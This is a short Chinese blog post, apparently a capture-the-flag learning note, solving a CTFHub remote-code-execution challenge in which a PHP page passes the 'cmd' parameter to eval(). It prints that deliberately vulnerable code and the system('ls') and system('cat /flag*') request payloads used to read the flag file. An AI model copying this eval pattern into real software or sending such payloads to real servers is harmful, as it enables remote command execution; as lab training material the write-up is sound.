CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
然然阿然然2 小时前
2025.1.16——六、BabySQL 双写绕过|联合注入
数据库·学习·mysql·web安全·网络安全
江木1234 小时前
Python Numba多流和共享内存CUDA优化技术学习记录
开发语言·python·学习
虾球xz4 小时前
游戏引擎学习第80天
学习·游戏引擎
Rousson4 小时前
硬件学习笔记--34 GB/T17215.321相关内容介绍
网络·笔记·学习
rgrgrwfe5 小时前
【golang学习之旅】使用VScode安装配置Go开发环境
vscode·学习·golang
朗迹 - 张伟6 小时前
GoLang 微服务学习笔记
学习·微服务·golang
m0_748251356 小时前
爬虫学习记录
爬虫·学习
近听水无声4776 小时前
STL容器-- list的模拟实现(附源码)
c++·学习
懒洋洋爱睡觉6 小时前
考研计算机组成原理——零基础学习的笔记
笔记·学习·考研
来恩10036 小时前
.NET 学习:从基础到进阶的全面指南
学习·.net
热门推荐
01密码学原理技术-第六章-introduction to pulibc-key cryptography02(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明03半导体应用系统一些小知识收集(strip&wafer mapping,EAP&scada)04Ollama私有化部署大语言模型LLM(上)05Dell服务器升级ubuntu 22.04失败解决06优化手机性能,解决卡顿问题:关闭这3个微信开关,释放内存空间07学英语学压测:08 jmeter html测试报告&测试报告的3种生成方式08PyTorch AMP 混合精度中grad_scaler.py的scale函数解析09渗透测试之SQLMAP工具详解 kali自带SQLmap解释 重点sqlmap --tamper 使用方式详解 搞完你就很nice了10k8s物料清单工具——KubeClarity